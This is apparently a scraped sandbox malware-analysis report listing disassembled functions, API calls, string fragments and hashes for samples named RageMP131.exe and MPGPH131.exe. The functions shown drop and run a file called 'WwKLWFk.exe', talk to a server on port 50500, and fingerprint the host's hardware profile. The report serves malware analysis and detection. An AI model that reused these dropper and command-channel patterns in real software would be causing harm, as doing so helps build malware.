Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: c9d6b1ff241e5fd832478be8655ed88bbb31281d949e4ef5c290a9bce0338137
Instruction ID: 30097b6c47e032f552a6757f4ed9b6bbe32c32376421c3ee7c513e6880c1552d
Opcode Fuzzy Hash: c9d6b1ff241e5fd832478be8655ed88bbb31281d949e4ef5c290a9bce0338137
Instruction Fuzzy Hash: 1C11D2B2900708ABC711DF58E801B96B7DCAF05310F14C62BF9589B681F774EA54CB95

Function 003726F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 00372BD3

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 1225f2861d56ee1c0f9ddf293a9480c2585ea23aa4553cfe4ff6ddb6643cac3b
Instruction ID: 459f5dc0926a4299ce4782244a28dadec5d6aa43b27313f4ef72616c065bfb1b
Opcode Fuzzy Hash: 1225f2861d56ee1c0f9ddf293a9480c2585ea23aa4553cfe4ff6ddb6643cac3b
Instruction Fuzzy Hash: ADE1E371A002059FCB29DF28C891A6EB7A5FF49310F15C36AE819EB391E734ED51CB90

Function 00308080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0030844D

Strings

ror, xrefs: 003080D4
parse error, xrefs: 00308149, 00308162

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 069a050bcc951d00ed4a1761ffc5c10738d8aa00f15df624154de0dfed608241
Instruction ID: 712217994404f9eea094b8e87e7a578fba5438939b80879ef9de603abb5c1792
Opcode Fuzzy Hash: 069a050bcc951d00ed4a1761ffc5c10738d8aa00f15df624154de0dfed608241
Instruction Fuzzy Hash: 9FC11331D10659CFEB0ACF68CC95BADBB71BF45304F148259E044AB6D2DB74AA85CB90

Function 00307DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00308051
___std_exception_destroy.LIBVCRUNTIME ref: 00308060

Strings

[json.exception., xrefs: 00307E1C

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 70474413f1296d8f9fcffc4a5ab505b444ea9b6614a806f8b1e960b359b7d4f2
Instruction ID: 7827a7386969a2c6792d8b85567b88e87984226c76e62627ed2b2d9be5051957
Opcode Fuzzy Hash: 70474413f1296d8f9fcffc4a5ab505b444ea9b6614a806f8b1e960b359b7d4f2
Instruction Fuzzy Hash: 17912631D112089FDB1ACFA8CC95BAEFBB5FF45314F148259E400AB6D2DBB4A984C790

Function 00303A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00303C0F

Strings

ios_base::failbit set, xrefs: 00303AC8
ios_base::badbit set, xrefs: 00303BA7, 00303BD2, 00303BF3

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: ad6c25f52ef5f5e2c22e3448e1382998228ff2b689e1f9f97f714e59d0a76fe0
Instruction ID: 25b6af1d6b1ef03a353d3a9ca2296ef8d6a49f7e277e92037b8abede0b981f2a
Opcode Fuzzy Hash: ad6c25f52ef5f5e2c22e3448e1382998228ff2b689e1f9f97f714e59d0a76fe0
Instruction Fuzzy Hash: F641F672910604ABCB05DF58DC85BAAFBB9EF45310F14822AF9149B6C1E774AA40CB95

Function 00374250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00374AB9
___std_exception_destroy.LIBVCRUNTIME ref: 00374AD2
___std_exception_destroy.LIBVCRUNTIME ref: 003755DD
___std_exception_destroy.LIBVCRUNTIME ref: 003755F6

Strings

value, xrefs: 00375503

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 98c7715dbd71f1d2103ad5e92e5fb3c10387da3ca951bb80336ce2adb6d93992
Instruction ID: a1eaed9266ab5c57f2e6cb6dd5f913d821faac2ffaefeed54e1e006097d704a5
Opcode Fuzzy Hash: 98c7715dbd71f1d2103ad5e92e5fb3c10387da3ca951bb80336ce2adb6d93992
Instruction Fuzzy Hash: 2D51E3B1C00258DFDF26DFA4CC85BDEBBB4AF05304F148259E449AB382D7786688CB51

Function 00379630 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00379681

Strings

type must be boolean, but is , xrefs: 00379772
type must be string, but is , xrefs: 003796E8

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 836650821aed3ca52020c6cd5df08ba0b7bba2b40df1a9e749ffb503f9e66020
Instruction ID: ad3d3870c9bb876b4eb809998021c8d64e9696f1217ca5a486359f132af683f3
Opcode Fuzzy Hash: 836650821aed3ca52020c6cd5df08ba0b7bba2b40df1a9e749ffb503f9e66020
Instruction Fuzzy Hash: 12316EB1D002489FCB16EBA4D842F9E77A9DB14710F10836AF419DB7D6EB38AD04C755

Analysis Process: RageMP131.exePID: 5640, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	1.9%
Signature Coverage:	0%
Total number of Nodes:	261
Total number of Limit Nodes:	26

Executed Functions

Function 00821044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00821223
WriteFile.KERNELBASE(00000000,FFFFCD8F,00003E00,?,00000000), ref: 00821252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00821256
WinExec.KERNEL32(?,00000005), ref: 00821262

Strings

.dll, xrefs: 00821102
lstr, xrefs: 008211A7
Kern, xrefs: 008210F4
catA, xrefs: 008211AF
GetM, xrefs: 008210B6
GetT, xrefs: 00821188
WwKLWFk.exe, xrefs: 008211FD, 00821200
Writ, xrefs: 00821148
athA, xrefs: 00821199
odul, xrefs: 0082122D
WinE, xrefs: 00821110
Clos, xrefs: 00821129
el32, xrefs: 008210FB
dleA, xrefs: 008210D0
Crea, xrefs: 00821169

Memory Dump Source

Source File: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WwKLWFk.exe$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-1035807574
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: 3075cfa525de2dac800afc0fb3ac393af3226dd00b7612f6e2224f353ea8c955
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 46611874D01229DBCF24CF94E888AADF7B4FF64315F2592AAD605AB200C3709ED1CB95

Function 0028EC20 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 265
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(00000360,0000FFFF,00001006,?,00000008), ref: 0028ECC7
recv.WS2_32(?,00000004,00000002), ref: 0028ECE1
recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 0028ED4E
recv.WS2_32(00000000,0000000C,00000008), ref: 0028ED6F
recv.WS2_32(00000000,?,00000008), ref: 0028EE0C

Part of subcall function 0028DB60: WSAStartup.WS2_32 ref: 0028DB8B
Part of subcall function 0028DB60: socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
Part of subcall function 0028DB60: connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC41
Part of subcall function 0028DB60: closesocket.WS2_32(00000000), ref: 0028DC4D

recv.WS2_32(?,00000004,00000008), ref: 0028F033
Sleep.KERNELBASE(00000001), ref: 0028F09E
Sleep.KERNELBASE(00000064), ref: 0028F0AC
__Mtx_unlock.LIBCPMT ref: 0028F211

Strings

0, xrefs: 0028EC7A
50500, xrefs: 0028EC75

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: recv$Sleep$Mtx_unlockStartupclosesocketconnectsetsockoptsocket
String ID: 0$50500
API String ID: 2930922264-4033130746
Opcode ID: 0c346d6ca639684d0c8e97293407d28d26297aaa83a2de93aa61572f0e7c9015
Instruction ID: dae38a021313e02948ccda1614ed36e9e32149150302c015cec5f4eef4c55fcd
Opcode Fuzzy Hash: 0c346d6ca639684d0c8e97293407d28d26297aaa83a2de93aa61572f0e7c9015
Instruction Fuzzy Hash: ACB1DD31D11259CFEB21EFA8CC85BADBBB5FF56310F248219E444AB2D6D770A994CB40

Function 0028E060 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 333
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00374438,00000000,00000000,-003A65B0), ref: 0028E3A6

Strings

0, xrefs: 0028EC7A
ta:, xrefs: 0028F1CA
50500, xrefs: 0028EC75
131, xrefs: 0028F2C8
;:, xrefs: 0028E525
Ws2_32.dll, xrefs: 0028E37D
\;:, xrefs: 0028EB85

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: Send
String ID: 0$131$50500$Ws2_32.dll$\;:$ta:$;:
API String ID: 121738739-3205092695
Opcode ID: eb47218c195e89c67ac32702a0bda55344d92cebe4719528535c72a6f4a206a5
Instruction ID: 0e595f855a3f7fb3b7055cfa4fd251295636b0cd604159c0137491fb835d4b08
Opcode Fuzzy Hash: eb47218c195e89c67ac32702a0bda55344d92cebe4719528535c72a6f4a206a5
Instruction Fuzzy Hash: D8D1FF30E14248DFDF14EFA8CC54BADBBF5AF02300F694258D855AB2C2E7709886CB91

Function 0028DB60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0028DB8B
socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC41
closesocket.WS2_32(00000000), ref: 0028DC4D

Strings

50500, xrefs: 0028DBE8

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID: 50500
API String ID: 3098855095-2230786414
Opcode ID: 4bb8ef687a670e8f2464cd31eb11b56a61069117ce825d761b3dd24cda41c261
Instruction ID: ef61f09da8e829b6a1623d3d4e7793ddaf38a30c619bba5d38bbeb1277ec1b77
Opcode Fuzzy Hash: 4bb8ef687a670e8f2464cd31eb11b56a61069117ce825d761b3dd24cda41c261
Instruction Fuzzy Hash: 1131E1765153016BC7209F289C89B6BB7E4EFC9734F105F1EF8A8A32D0E37098188792

Function 04E00763 Relevance: 1.7, APIs: 1, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32 ref: 04E00788

Memory Dump Source

Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f208e1c54c5ae15143d67f81cd2463ccc9d3eb3978539de2b404a9536cc06373
Instruction ID: bf018efaf00c9c19a35d7799c11adee334b102a6b4d5c94cb5c9e22cf6f01494
Opcode Fuzzy Hash: f208e1c54c5ae15143d67f81cd2463ccc9d3eb3978539de2b404a9536cc06373
Instruction Fuzzy Hash: E8417BEB20C121BCF11291823B50FFB176DE7D2730731E46AF817C1586F2891ACA2472

